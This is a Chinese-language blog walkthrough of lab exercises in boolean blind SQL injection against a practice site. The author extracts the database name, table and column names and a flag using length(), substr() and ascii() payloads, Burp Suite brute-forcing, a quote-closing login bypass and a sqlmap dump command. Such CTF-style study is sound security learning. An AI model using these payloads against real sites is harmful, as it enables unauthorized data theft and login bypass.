标签:语句 掌控 group database emm 安全 table 盲注 burpsuit
有时候,网站只会给我们极其简单的回显,如只告诉我们是否登录成功,甚至有时候根本没有响应。此时,基于报错的注入彻底失效,我们把这种回显极少甚至没有的情况下的注入攻击称为盲注,它本质上是一种暴力破解。
在我们输入and 1或者and 0,浏览器返回给我们两个不同的页面,而我们就可以根据返回的页面来判断正确的数据信息。页面只返回True和False两种类型页面。利用页面返回不同,逐个猜解数据。
emm,看题。
第一题
id=1和id=2是两种不同的页面,所以我们可以通过这来获取我们想要的信息。
我们先判断字段数
order by 3
order by 2
emm,很明显,两个字段。
那接下去我们就要判断数据库名了,
语句
union select 1,database()
emm,傻了,这怎么玩呐,
我们回到布尔盲注只有true和false这一特性上来,
这里介绍一个函数
length(string)(字符串)
判断字符串的长度
语句
and length(database())>20
用二分法判断数据库的字符长度为12个字符
这里在介绍一个函数
substr(string,start,length)(字符串,开始位置,截取长度)
语句
and substr(database(),1,1)>’a’
接下去就应该是burpsuit跑包了,但这里还有一个问题,就是burpsuit的攻击模块里面没有a到z,A到Z,所以这里还得介绍一个函数
ASCII(字符)函数用于将字符转换为ASCII码
语句
and ascii(substr(database(),1,1))=65(65是A的accii码,详情见ASCII表)
上burpsuit
这里有点问题,1和and之间没有空格,所以我一开始爆破不出来,后来改了改就好了,
emm,我们成功爆破出了数据库名,组装一下就好
kanwolongxia ???这神马神仙数据库名
然后,接下去查表明,这里还是用到了子查询
语句
and length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>1
这里不知道怎么回事,不用group_concat()函数就做不出来。
这里二分法得到总共表的长度为16
判断表名
语句
and substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1)>’a’
这里得到第一个字符是“l”
语句
and substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1)=’l’
还是上burpsuit
emm,我用burpsuit跑,有个别跑不出来,又单独跑了第二遍才跑出来。
我们得到了loflag表。
接下去得到字段
语句
and length((select group_concat(column_name) from information_schema.columns where table_name=’loflag’))>1
判断字段长度
二分法判断得字段长度为9
接下去判断字符
and substr((select group_concat(column_name) from information_schema.columns where table_name=’loflag’),1,1)>’a’
emm,ascii函数又能用了。
继续上burpsuit。
爆破出了字段名 Id,flaglo
接下去,判断数据长度
语句
and length((select group_concat(flaglo) from loflag))>1
emm,数据长度=55,
接下去判断字符
语句
and substr((select group_concat(flaglo) from loflag),1,1)>’a’
ascii函数还能用。
继续上burpsuit。
和之前一样,有个别扫不出来,又跑了一下。
emm,这一题太烦了,一直在burpsuit跑包。
至于sqlmap做法嘛,这一题扫不出来,只能在别的题下扫出这一题的数据库再扫出数据来。
第二题
语句
“and length(database())=12— domren
这一题是闭合就行,其他同第一题,这里不多赘述。
第三题
语句
admin’and length(database())=12— domren
这是这一题的万能密码,而且用户名必须是admin。其他做法同上。
突然间想起来,我第一题burpsuit不是跑出了数据库名,表命和字段名嘛,那sqlmap不是,emm
语句
python sqlmap.py -u http://inject2.lab.aqlab.cn:81/Pass-10/index.php?id=1 -D kanwolongxia -T loflag -C flaglo —dump
emm,跑burpsuit太费时间了。。
标签:语句,掌控,group,database,emm,安全,table,盲注,burpsuit 来源: https://blog.csdn.net/qq_43304861/article/details/115799662
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。